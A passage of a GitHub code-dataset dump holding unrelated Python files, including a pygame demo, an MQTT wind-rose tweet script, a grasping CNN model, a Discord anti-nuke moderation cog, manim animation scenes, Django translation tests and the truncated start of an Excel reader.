16).render(\"打破记录!\", 3, (255, 0, 0)), (380, 78))\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 70).render(\"恭喜您!\", 3, (0, 0, 200)), (125, 200))\n pygame.display.update()\n\n\nclass SysFonts:\n def show(self):\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((1280, 640))\n pygame.display.set_caption('洒墨 - 系统字体展示')\n # 载入图片\n background = pygame.image.load('resources/background.png')\n # 绘制背景\n # screen.blit(background, (0, 0))\n r = 0 # 行\n c = 0 # 列\n n = 0\n for f in pygame.font.get_fonts():\n n += 1\n if (78 <= n) and (n <= 79):\n continue\n color_ = (255, 255, 255)\n if n == 0:\n color_ = (0, 255, 0)\n screen.blit(pygame.font.SysFont(str(f), 20).render(\"洒墨\" + str(f)[0:9], 3, color_),\n (160 * c, 21 * r))\n r += 1\n if r == 30:\n c += 1\n r = 0\n screen.blit(\n pygame.font.SysFont(str(pygame.font.get_fonts()[78]), 20).render(str(43543435)[0:14], 3, (255, 255, 255)),\n (160 * c, 21 * 28))\n screen.blit(\n pygame.font.SysFont(str(pygame.font.get_fonts()[79]), 20).render(str(\"hell撒旦法???\")[0:14], 3,\n (255, 255, 255)),\n (160 * c, 21 * 29))\n # 更新屏幕\n pygame.display.update()\n while True:\n pygame.time.Clock().tick(128)\n for event in pygame.event.get():\n PlaneWar().check_whitespace_quit(event)\n print(\"\", end=\"\")\n","repo_name":"0jiejie0/sum","sub_path":"pymdl2001/demo/demo_module.py","file_name":"demo_module.py","file_ext":"py","file_size_in_byte":17846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32197571149","text":"import os, sys\nimport json\nimport pandas as pd\nimport pg8000 as pg\nimport plotly.express as pe\nimport io, base64\nfrom PIL import Image\nfrom paho.mqtt import publish\nfrom datetime import datetime\nfrom pendulum import timezone\n\nsys.path.append(os.path.dirname(__file__))\n\nwith open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'config.json', 'r') as config_file:\n config = json.load(config_file)\n\n# define constants\nCANVAS_WIDTH = 1200\nCANVAS_HEIGHT = 675\n\nTEXT_FONT_FAMILY = 'Roboto'\n\n\ndef open_db_conn():\n conn = pg.connect(\n host=config['database']['host'],\n port=config['database']['port'],\n user=config['database']['user'],\n password=config['database']['password'],\n database=config['database']['db']\n )\n\n return conn\n\n\ndef close_db_conn(conn):\n conn.close()\n\n\ndef get_wind_rose_data(conn):\n print('Getting wind rose data...')\n sql = config['sql']['daily_wind_rose']\n print('SQL: {0}'.format(sql))\n\n pandas_table = pd.read_sql_query(sql, conn)\n\n return pandas_table\n\n\ndef build_wind_rose_figure(pandas_data_table):\n print('Building wind rose figure...')\n\n wind_rose_title = config['wind_rose']['title'].format(datetime.now(timezone('US/Eastern')).strftime('%Y-%m-%d %H:%M:%S %Z'))\n\n wind_rose = pe.bar_polar(\n pandas_data_table,\n r='frequency',\n theta='direction',\n color='strength',\n labels={\n 'strength': 'Wind Speed (MPH)'\n },\n height=CANVAS_HEIGHT,\n width=CANVAS_WIDTH\n )\n\n wind_rose.update_layout(\n # font_family=TEXT_FONT_FAMILY,\n title={\n 'text': wind_rose_title,\n 'x': 0.5\n },\n polar=dict(\n angularaxis=dict(\n categoryarray=['N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW'])\n )\n )\n\n return wind_rose\n\n\ndef encode_image(graph_figure):\n print('Encoding graph figure...')\n\n img_bytes = graph_figure.to_image(format='jpg')\n pil_img = Image.open(io.BytesIO(img_bytes))\n\n with io.BytesIO() as file_like_img:\n pil_img.save(file_like_img, 'JPEG')\n img_data = file_like_img.getvalue()\n\n encoded_image = base64.b64encode(img_data)\n encoded_image = encoded_image.decode('utf8')\n\n return encoded_image\n\n\ndef publish_tweet(image):\n print('Publishing tweet to MQTT...')\n message = \"Average Wind Speed and Direction Over Previous 24 Hours as of {0}\".format(datetime.now().astimezone(timezone('US/Eastern')).strftime('%Y-%m-%d %H:%M:%S %Z'))\n # build MQTT payload\n tweet = {\n # 'message': config['tweet']['message'],\n 'message': message,\n 'hash_tags': config['tweet']['hash_tags'],\n 'media': image\n }\n\n publish.single(\n topic=config['mqtt']['topic'],\n payload=json.dumps(tweet),\n hostname=config['mqtt']['host'],\n port=1883,\n client_id='wind_rose',\n qos=0\n )\n\n\ndef build_daily_wind_rose():\n print('Building daily wind rose...')\n db = open_db_conn()\n data = get_wind_rose_data(db)\n fig = build_wind_rose_figure(data)\n # fig.show() # only for testing\n enc_img = encode_image(fig)\n publish_tweet(enc_img)\n\nif __name__ == '__main__':\n build_daily_wind_rose()","repo_name":"dad2cl3/ClimateStationMallory","sub_path":"airflow/dags/daily_tweets/daily_wind_rose.py","file_name":"daily_wind_rose.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32388768348","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass GGCNN2(nn.Module):\n def __init__(self, input_channels=1, filter_sizes=None, l3_k_size=5, dilations=None):\n super().__init__()\n\n if filter_sizes is None:\n filter_sizes = [16, # First set of convs\n 16, # Second set of convs\n 32, # Dilated convs\n 16] # Transpose Convs\n\n if dilations is None:\n dilations = [2, 4]\n\n self.features = nn.Sequential(\n # 4 conv layers.\n nn.Conv2d(input_channels, filter_sizes[0], kernel_size=11, stride=1, padding=5, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(filter_sizes[0], filter_sizes[0], kernel_size=5, stride=1, padding=2, bias=True),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(filter_sizes[0], filter_sizes[1], kernel_size=5, stride=1, padding=2, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(filter_sizes[1], filter_sizes[1], kernel_size=5, stride=1, padding=2, bias=True),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n # Dilated convolutions.\n nn.Conv2d(filter_sizes[1], filter_sizes[2], kernel_size=l3_k_size, dilation=dilations[0], stride=1, padding=(l3_k_size//2 * dilations[0]), bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(filter_sizes[2], filter_sizes[2], kernel_size=l3_k_size, dilation=dilations[1], stride=1, padding=(l3_k_size//2 * dilations[1]), bias=True),\n nn.ReLU(inplace=True),\n\n # Output layers\n nn.UpsamplingBilinear2d(scale_factor=2),\n nn.Conv2d(filter_sizes[2], filter_sizes[3], 3, padding=1),\n nn.ReLU(inplace=True),\n nn.UpsamplingBilinear2d(scale_factor=2),\n nn.Conv2d(filter_sizes[3], filter_sizes[3], 3, padding=1),\n nn.ReLU(inplace=True),\n )\n\n self.pos_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n self.cos_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n self.sin_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n self.width_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d)):\n nn.init.xavier_uniform_(m.weight, gain=1)\n\n def forward(self, x):\n x = self.features(x)\n\n pos_output = self.pos_output(x)\n cos_output = self.cos_output(x)\n sin_output = self.sin_output(x)\n width_output = self.width_output(x)\n\n return pos_output, cos_output, sin_output, width_output\n","repo_name":"jessiezhang117-uni/Graduation-project","sub_path":"ggcnn_new_dataset/models/ggcnn2.py","file_name":"ggcnn2.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3820468095","text":"# -*- coding: utf-8 -*-\r\n\r\n# -----------------------------------------------------------\r\n# Logs analyzer and nuke protection from bots and administrators.\r\n#\r\n# (C) 2020 Tony De Freitas, Toulouse, France\r\n# Released under GNU Affero General Public License v3.0 (AGPLv3)\r\n# email defreitas.tony.pro@gmail.com\r\n# -----------------------------------------------------------\r\n\r\n\r\nimport discord\r\nimport asyncio\r\nfrom logs import logs as lg\r\nfrom datetime import datetime\r\nfrom cogs.affichage import embed\r\nfrom cogs.affichage import couleur\r\n\r\nlimits = {discord.AuditLogAction.channel_create : {\"per_minute\" : 5, \"per_hour\" : 12},\r\n discord.AuditLogAction.channel_delete : {\"per_minute\" : 5, \"per_hour\" : 12},\r\n discord.AuditLogAction.kick : {\"per_minute\" : 7, \"per_hour\" : 14},\r\n discord.AuditLogAction.ban : {\"per_minute\" : 7, \"per_hour\" : 14},\r\n discord.AuditLogAction.role_create : {\"per_minute\" : 6, \"per_hour\" : 12},\r\n discord.AuditLogAction.role_delete : {\"per_minute\" : 6, \"per_hour\" : 12}}\r\n\r\nasync def logs_channel_create(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.channel_create)\r\n\r\nasync def logs_channel_delete(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.channel_delete)\r\n\r\nasync def logs_member_remove(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.channel_create)\r\n\r\nasync def logs_role_create(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.role_create)\r\n\r\nasync def logs_role_delete(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.role_delete)\r\n\r\nasync def logs_sorter(self, guild, action):\r\n \"\"\" Vérifie que l'auteur du dernier log du serveur n'est pas en infraction \"\"\"\r\n\r\n async for entry in guild.audit_logs(limit=1):\r\n admin = entry.user\r\n\r\n logs = guild.audit_logs(limit=100, action=action, user=admin)\r\n\r\n last_minute = list()\r\n last_hour = list()\r\n\r\n async for entry in logs:\r\n if (datetime.utcnow() - entry.created_at).seconds < 60:\r\n last_minute.append(entry)\r\n last_hour.append(entry)\r\n elif (datetime.utcnow() - entry.created_at).seconds < 3600:\r\n last_hour.append(entry)\r\n\r\n if not admin.id == 672521812315471883:\r\n if limits[action][\"per_minute\"] <= len(last_minute):\r\n return await admin_suspension(self, guild, admin, last_minute, action)\r\n elif limits[action][\"per_hour\"] <= len(last_hour):\r\n return await admin_suspension(self, guild, admin, last_hour, action)\r\n return None\r\n\r\nasync def admin_suspension(self, guild, admin, logs, action):\r\n \"\"\" Relève de ses fonctions un administrateur du serveur suite à incident \"\"\"\r\n \r\n for role in admin.roles:\r\n if not role.name == '@everyone':\r\n await admin.remove_roles(role)\r\n\r\n sentences = {discord.AuditLogAction.channel_create : \"Création du salon \",\r\n discord.AuditLogAction.channel_delete : \"Suppression du salon \",\r\n discord.AuditLogAction.kick : \"Kick du membre \",\r\n discord.AuditLogAction.ban : \"Ban du membre \",\r\n discord.AuditLogAction.role_create : \"Création du rôle \",\r\n discord.AuditLogAction.role_delete : \"Suppression du rôle \"}\r\n\r\n reason = str()\r\n if action == discord.AuditLogAction.channel_create or action == discord.AuditLogAction.role_create:\r\n for l in logs:\r\n reason += sentences[action] + \"`\" + str(l.after.name) + \"`\" + \" il y a \" + str((datetime.utcnow() - l.created_at).seconds) + \"secondes\" + \"\\n\"\r\n elif action == discord.AuditLogAction.channel_delete or action == discord.AuditLogAction.role_delete:\r\n for l in logs:\r\n reason += sentences[action] + \"`\" + str(l.before.name) + \"`\" + \" il y a \" + str((datetime.utcnow() - l.created_at).seconds) + \"secondes\" + \"\\n\"\r\n else:\r\n for l in logs:\r\n reason += sentences[action] + \"`\" + str(l.target) + \"`\" + \" il y a \" + str((datetime.utcnow() - l.created_at).seconds) + \"secondes\" + \"\\n\"\r\n\r\n await lg.member_log(self, admin, \"Suspension\", f\"Suite à une anomalie détectée dans les logs du serveur, je suis donc dans l'obligation de vous relever de vos fonctions pour assurer l'intégrité du serveur. Les membres du Staff ont été informés de l'incident et ils devront déterminer si la sanction que j'ai appliqué à votre encontre est légitime ou non.\\n\\nRaison :\\n{reason}\")\r\n await lg.staff_logs(self, guild, admin, guild.me, \"Suspension\", f\"Suite à une anomalie détectée dans les logs du serveur, j'ai suspendu l'administrateur afin de préserver l'intégrité du serveur. Tout administrateur ayant un niveau d'accès 3 sont priés de bien vouloir décider si la sanction que j'ai appliqué est justifié ou non. Merci de votre compréhension.\\n\\nRaison :\\n{reason}\")\r\n","repo_name":"Ventona666/Chat-bot-E.V.E","sub_path":"guard/nuke_guard.py","file_name":"nuke_guard.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1180948547","text":"list_1 = [2, 5, 7, 10]\nlist_2 = [3, 8, 4, 9]\nto_find = 56\n\n\ndef multiplication(find: int, lst_1: list, lst_2: list) -> tuple:\n for x in lst_1:\n for y in lst_2:\n result = x * y\n yield x, y, result\n if result == find:\n print('Found!!!')\n return\n\n\nfor num in multiplication(to_find, list_1, list_2):\n print(str(num)[1:-1])\n\n# зачет!\n","repo_name":"Mihalich2981/Python","sub_path":"Module26/02_refactoring/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8396935511","text":"from warnings import simplefilter\n\nimport numpy as np\n\nimport wandb\nfrom wandb.sklearn import utils\n\n# ignore all future warnings\nsimplefilter(action=\"ignore\", category=FutureWarning)\n\n\ndef outlier_candidates(regressor, X, y):\n # Fit a linear model to X and y to compute MSE\n regressor.fit(X, y)\n\n # Leverage is computed as the diagonal of the projection matrix of X\n leverage = (X * np.linalg.pinv(X).T).sum(1)\n\n # Compute the rank and the degrees of freedom of the OLS model\n rank = np.linalg.matrix_rank(X)\n df = X.shape[0] - rank\n\n # Compute the MSE from the residuals\n residuals = y - regressor.predict(X)\n mse = np.dot(residuals, residuals) / df\n\n # Compute Cook's distance\n residuals_studentized = residuals / np.sqrt(mse) / np.sqrt(1 - leverage)\n distance_ = residuals_studentized**2 / X.shape[1]\n distance_ *= leverage / (1 - leverage)\n\n # Compute the influence threshold rule of thumb\n influence_threshold_ = 4 / X.shape[0]\n outlier_percentage_ = sum(distance_ >= influence_threshold_) / X.shape[0]\n outlier_percentage_ *= 100.0\n\n distance_dict, count = [], 0\n for d in distance_:\n distance_dict.append(d)\n count += 1\n if utils.check_against_limit(\n count,\n \"outlier_candidates\",\n utils.chart_limit,\n ):\n break\n\n table = make_table(distance_dict, outlier_percentage_, influence_threshold_)\n chart = wandb.visualize(\"wandb/outliers/v1\", table)\n\n return chart\n\n\ndef make_table(distance, outlier_percentage, influence_threshold):\n columns = [\n \"distance\",\n \"instance_indicies\",\n \"outlier_percentage\",\n \"influence_threshold\",\n ]\n\n data = [\n [distance[i], i, utils.round_3(outlier_percentage), influence_threshold]\n for i in range(len(distance))\n ]\n\n table = wandb.Table(columns=columns, data=data)\n\n return table\n","repo_name":"wandb/wandb","sub_path":"wandb/sklearn/calculate/outlier_candidates.py","file_name":"outlier_candidates.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"29971956764","text":"#!/usr/bin/env python\n\nfrom manimlib.imports import *\n\n# To watch one of these scenes, run the following:\n# python -m manim example_scenes.py SquareToCircle -pl\n#\n# Use the flat -l for a faster rendering at a lower\n# quality.\n# Use -s to skip to the end and just save the final frame\n# Use the -p to have the animation (or image, if -s was\n# used) pop up once done.\n# Use -n to skip ahead to the n'th animation of a scene.\n# Use -r to specify a resolution (for example, -r 1080\n# for a 1920x1080 video)\n\n\nclass OpeningManimExample(Scene):\n def construct(self):\n title = TextMobject(\"This is some \\\\LaTeX\")\n basel = TexMobject(\n \"\\\\sum_{n=1}^\\\\infty \"\n \"\\\\frac{1}{n^2} = \\\\frac{\\\\pi^2}{6}\"\n )\n VGroup(title, basel).arrange(DOWN)\n self.play(\n Write(title),\n FadeInFrom(basel, UP),\n )\n self.wait()\n\n transform_title = TextMobject(\"That was a transform\")\n transform_title.to_corner(UP + LEFT)\n self.play(\n Transform(title, transform_title),\n LaggedStart(*map(FadeOutAndShiftDown, basel)),\n )\n self.wait()\n\n grid = NumberPlane()\n grid_title = TextMobject(\"This is a grid\")\n grid_title.scale(1.5)\n grid_title.move_to(transform_title)\n\n self.add(grid, grid_title) # Make sure title is on top of grid\n self.play(\n FadeOut(title),\n FadeInFromDown(grid_title),\n ShowCreation(grid, run_time=3, lag_ratio=0.1),\n )\n self.wait()\n\n grid_transform_title = TextMobject(\n \"That was a non-linear function \\\\\\\\\"\n \"applied to the grid\"\n )\n grid_transform_title.move_to(grid_title, UL)\n grid.prepare_for_nonlinear_transform()\n self.play(\n grid.apply_function,\n lambda p: p + np.array([\n np.sin(p[1]),\n np.sin(p[0]),\n 0,\n ]),\n run_time=3,\n )\n self.wait()\n self.play(\n Transform(grid_title, grid_transform_title)\n )\n self.wait()\n\n\nclass SquareToCircle(Scene):\n def construct(self):\n circle = Circle()\n square = Square()\n square.flip(RIGHT)\n square.rotate(-3 * TAU / 8)\n circle.set_fill(PINK, opacity=0.5)\n\n self.play(ShowCreation(square))\n self.play(Transform(square, circle))\n self.play(FadeOut(square))\n\n\nclass WarpSquare(Scene):\n def construct(self):\n square = Square()\n self.play(ApplyPointwiseFunction(\n lambda point: complex_to_R3(np.exp(R3_to_complex(point))),\n square\n ))\n self.wait()\n\n\nclass WriteStuff(Scene):\n def construct(self):\n example_text = TextMobject(\n \"This is a some text\",\n tex_to_color_map={\"text\": YELLOW}\n )\n example_tex = TexMobject(\n \"\\\\sum_{k=1}^\\\\infty {1 \\\\over k^2} = {\\\\pi^2 \\\\over 6}\",\n )\n group = VGroup(example_text, example_tex)\n group.arrange(DOWN)\n group.set_width(FRAME_WIDTH - 2 * LARGE_BUFF)\n\n self.play(Write(example_text))\n self.play(Write(example_tex))\n self.wait()\n\n\nclass UpdatersExample(Scene):\n def construct(self):\n decimal = DecimalNumber(\n 0,\n show_ellipsis=True,\n num_decimal_places=3,\n include_sign=True,\n )\n square = Square().to_edge(UP)\n\n decimal.add_updater(lambda d: d.next_to(square, RIGHT))\n decimal.add_updater(lambda d: d.set_value(square.get_center()[1]))\n self.add(square, decimal)\n self.play(\n square.to_edge, DOWN,\n rate_func=there_and_back,\n run_time=5,\n )\n self.wait()\n\n# See old_projects folder for many, many more\nclass AudioTest(Scene):\n def construct(self):\n group_dots = VGroup(*[Dot()for i in range(3)])\n group_dots.arrange_submobjects(RIGHT)\n \n for dot in group_dots:\n self.add_sound(\"/home/codexreckoner/manim/media/designs/sounds/click.wav\")\n self.play(FadeIn(dot))\n self.wait(3)\n\nclass SVGTest(Scene):\n def construct(self):\n svg = SVGMobject(\"/home/codexreckoner/manim/media/designs/svg_images/finger.svg\")\n self.play(Write(svg))\n self.wait()\nclass ImageTest(Scene):\n def construct(self):\n image = ImageMobject(\"/home/codexreckoner/manim/media/designs/raster_images/space.jpg\")\n image.scale(7)\n self.play(FadeIn(image))\n self.wait(3)\n \n Text = TextMobject(\"Prueba para fondos de animacion\")\n self.play(Write(Text))\n self.wait(3)\n \nclass TikzMobject(TextMobject):\n CONFIG = {\n \"stroke_width\": 3,\n \"fill_opacity\": 0,\n \"stroke_opacity\": 1,\n }\n\nclass ExampleTikz(Scene):\n def construct(self):\n circuit = TikzMobject(r\"\"\"\n \\begin{circuitikz}[american voltages]\n \\draw\n (0,0) to [short, *-] (6,0)\n to [V, l_=$\\mathrm{j}{\\omega}_m \\underline{\\psi}^s_R$] (6,2) \n to [R, l_=$R_R$] (6,4) \n to [short, i_=$\\underline{i}^s_R$] (5,4) \n (0,0) to [open,v^>=$\\underline{u}^s_s$] (0,4) \n to [short, *- ,i=$\\underline{i}^s_s$] (1,4) \n to [R, l=$R_s$] (3,4)\n to [L, l=$L_{\\sigma}$] (5,4) \n to [short, i_=$\\underline{i}^s_M$] (5,3) \n to [L, l_=$L_M$] (5,0); \n \\end{circuitikz}\n \"\"\"\n )\n self.play(Write(circuit))\n self.wait()\n\n","repo_name":"JazzzFM/ManimAct","sub_path":"MyAnimations/example_scenes.py","file_name":"example_scenes.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6305829035","text":"import os\n\nfrom django.template import Context, Template\nfrom django.test import SimpleTestCase, override_settings\nfrom django.utils.translation import activate, get_language, trans_real\n\nfrom .utils import POFileAssertionMixin\n\nSAMPLEPROJECT_DIR = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"sampleproject\"\n)\nSAMPLEPROJECT_LOCALE = os.path.join(SAMPLEPROJECT_DIR, \"locale\")\n\n\n@override_settings(LOCALE_PATHS=[SAMPLEPROJECT_LOCALE])\nclass FrenchTestCase(SimpleTestCase):\n \"\"\"Tests using the French translations of the sampleproject.\"\"\"\n\n PO_FILE = os.path.join(SAMPLEPROJECT_LOCALE, \"fr\", \"LC_MESSAGES\", \"django.po\")\n\n def setUp(self):\n self._language = get_language()\n self._translations = trans_real._translations\n activate(\"fr\")\n\n def tearDown(self):\n trans_real._translations = self._translations\n activate(self._language)\n\n\nclass ExtractingStringsWithPercentSigns(POFileAssertionMixin, FrenchTestCase):\n \"\"\"\n Tests the extracted string found in the gettext catalog.\n\n Percent signs are python formatted.\n\n These tests should all have an analogous translation tests below, ensuring\n the Python formatting does not persist through to a rendered template.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n with open(self.PO_FILE) as fp:\n self.po_contents = fp.read()\n\n def test_trans_tag_with_percent_symbol_at_the_end(self):\n self.assertMsgId(\n \"Literal with a percent symbol at the end %%\", self.po_contents\n )\n\n def test_trans_tag_with_percent_symbol_in_the_middle(self):\n self.assertMsgId(\n \"Literal with a percent %% symbol in the middle\", self.po_contents\n )\n self.assertMsgId(\"It is 100%%\", self.po_contents)\n\n def test_trans_tag_with_string_that_look_like_fmt_spec(self):\n self.assertMsgId(\n \"Looks like a str fmt spec %%s but should not be interpreted as such\",\n self.po_contents,\n )\n self.assertMsgId(\n \"Looks like a str fmt spec %% o but should not be interpreted as such\",\n self.po_contents,\n )\n\n def test_adds_python_format_to_all_percent_signs(self):\n self.assertMsgId(\n \"1 percent sign %%, 2 percent signs %%%%, 3 percent signs %%%%%%\",\n self.po_contents,\n )\n self.assertMsgId(\n \"%(name)s says: 1 percent sign %%, 2 percent signs %%%%\", self.po_contents\n )\n\n\nclass RenderingTemplatesWithPercentSigns(FrenchTestCase):\n \"\"\"\n Test rendering of templates that use percent signs.\n\n Ensures both translate and blocktranslate tags behave consistently.\n\n Refs #11240, #11966, #24257\n \"\"\"\n\n def test_translates_with_a_percent_symbol_at_the_end(self):\n expected = \"Littérale avec un symbole de pour cent à la fin %\"\n\n trans_tpl = Template(\n \"{% load i18n %}\"\n '{% translate \"Literal with a percent symbol at the end %\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}Literal with a percent symbol at \"\n \"the end %{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n def test_translates_with_percent_symbol_in_the_middle(self):\n expected = \"Pour cent littérale % avec un symbole au milieu\"\n\n trans_tpl = Template(\n \"{% load i18n %}\"\n '{% translate \"Literal with a percent % symbol in the middle\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}Literal with a percent % symbol \"\n \"in the middle{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n def test_translates_with_percent_symbol_using_context(self):\n trans_tpl = Template('{% load i18n %}{% translate \"It is 100%\" %}')\n self.assertEqual(trans_tpl.render(Context({})), \"Il est de 100%\")\n trans_tpl = Template(\n '{% load i18n %}{% translate \"It is 100%\" context \"female\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), \"Elle est de 100%\")\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}It is 100%{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), \"Il est de 100%\")\n block_tpl = Template(\n \"{% load i18n %}\"\n '{% blocktranslate context \"female\" %}It is 100%{% endblocktranslate %}'\n )\n self.assertEqual(block_tpl.render(Context({})), \"Elle est de 100%\")\n\n def test_translates_with_string_that_look_like_fmt_spec_with_trans(self):\n # tests \"%s\"\n expected = (\n \"On dirait un spec str fmt %s mais ne devrait pas être interprété comme \"\n \"plus disponible\"\n )\n trans_tpl = Template(\n '{% load i18n %}{% translate \"Looks like a str fmt spec %s but '\n 'should not be interpreted as such\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}Looks like a str fmt spec %s but \"\n \"should not be interpreted as such{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n # tests \"% o\"\n expected = (\n \"On dirait un spec str fmt % o mais ne devrait pas être interprété comme \"\n \"plus disponible\"\n )\n trans_tpl = Template(\n \"{% load i18n %}\"\n '{% translate \"Looks like a str fmt spec % o but should not be '\n 'interpreted as such\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n block_tpl = Template(\n \"{% load i18n %}\"\n \"{% blocktranslate %}Looks like a str fmt spec % o but should not be \"\n \"interpreted as such{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n def test_translates_multiple_percent_signs(self):\n expected = (\n \"1 % signe pour cent, signes %% 2 pour cent, trois signes de pourcentage \"\n \"%%%\"\n )\n trans_tpl = Template(\n '{% load i18n %}{% translate \"1 percent sign %, 2 percent signs %%, '\n '3 percent signs %%%\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}1 percent sign %, 2 percent signs \"\n \"%%, 3 percent signs %%%{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}{{name}} says: 1 percent sign %, \"\n \"2 percent signs %%{% endblocktranslate %}\"\n )\n self.assertEqual(\n block_tpl.render(Context({\"name\": \"Django\"})),\n \"Django dit: 1 pour cent signe %, deux signes de pourcentage %%\",\n )\n","repo_name":"django/django","sub_path":"tests/i18n/test_percents.py","file_name":"test_percents.py","file_ext":"py","file_size_in_byte":7199,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"22424026429","text":"#Faça um programa que receba a temperatura média de cada mês do ano e armazene-as em uma lista. Após isto, calcule a média anual das temperaturas e mostre todas as temperaturas acima da média anual, e em que mês elas ocorreram (mostrar o mês por extenso: 1 – Janeiro, 2 – Fevereiro, . . . ).\n\nfrom random import uniform\nfrom time import sleep\n\nmeses_ano = [\"Janeiro\", \"Fevereiro\", \"Março\", \"Abril\", \"Maio\", \"Junho\", \"Julho\", \"Agosto\", \"Setembro\", \"Outubro\", \"Novembro\", \"Dezembro\"]\ntemperaturas = []\ntemperaturas_elevadas =[]\nsoma, media = 0, 0\nfor c in range(0, 12):\n temperatura_mensal = uniform(20.0, 40.0)\n temperaturas.append(temperatura_mensal)\n soma+= temperatura_mensal\nmedia = soma / len(temperaturas)\nfor c in range(0,12):\n if str(temperatura_mensal)[c] > str(media):\n temperaturas_elevadas.append(meses_ano[c])\n\nprint(f\"Os meses do ano com temperaturas mais elevadas foram {temperaturas_elevadas}\")\n\n\n","repo_name":"Fillypper/Curso_Python","sub_path":"Exercicios_Listas/exercicio_13.py","file_name":"exercicio_13.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20266632980","text":"import coverage\r\nimport unittest\r\n\r\nif __name__ == \"__main__\":\r\n cov = coverage.Coverage()\r\n\r\n cov.start()\r\n suite = unittest.TestLoader().discover(\"streamanalyser/tests\", pattern=\"*\")\r\n unittest.TextTestRunner().run(suite)\r\n cov.stop()\r\n\r\n cov.save()\r\n\r\n cov.report()\r\n\r\n cov.html_report()\r\n","repo_name":"emso-c/stream-analyser","sub_path":"test_coverage.py","file_name":"test_coverage.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70278551789","text":"from future.utils import iteritems\nfrom past.builtins import xrange, range\n\nimport os\nimport sys\nimport warnings\nimport json\n\nfrom typing import Any, Callable, Dict, IO, List, Optional, Union\n\nimport xlrd\nimport openpyxl\nimport glom\n\nimport pypath.share.session as session_mod\nimport pypath.share.common as common\nimport pypath.share.constants as constants\n\n_logger = session_mod.Logger(name = 'inputs_common')\n_log = _logger._log\n_console = _logger._console\n\nif 'unicode' not in __builtins__: unicode = str\n\n\ndef read_xls(\n xls_file,\n sheet = 0,\n use_openpyxl = False,\n cell_range = None,\n ):\n \"\"\"\n Generic function to read MS Excel XLS file, and convert one sheet\n to CSV, or return as a list of lists\n \"\"\"\n\n table = []\n opened_here = False\n\n if isinstance(xls_file, common.basestring):\n\n if os.path.exists(xls_file):\n\n xls_file = open(xls_file, 'rb')\n opened_here = True\n\n else:\n\n raise FileNotFoundError(xls_file)\n\n if not use_openpyxl:\n\n try:\n\n _log('Reading XLS(X) by xlrd.')\n\n if hasattr(xls_file, 'read'):\n\n book = xlrd.open_workbook(\n file_contents = xls_file.read(),\n on_demand = True,\n )\n\n try:\n if isinstance(sheet, int):\n sheet = book.sheet_by_index(sheet)\n else:\n sheet = book.sheet_by_name(sheet)\n except 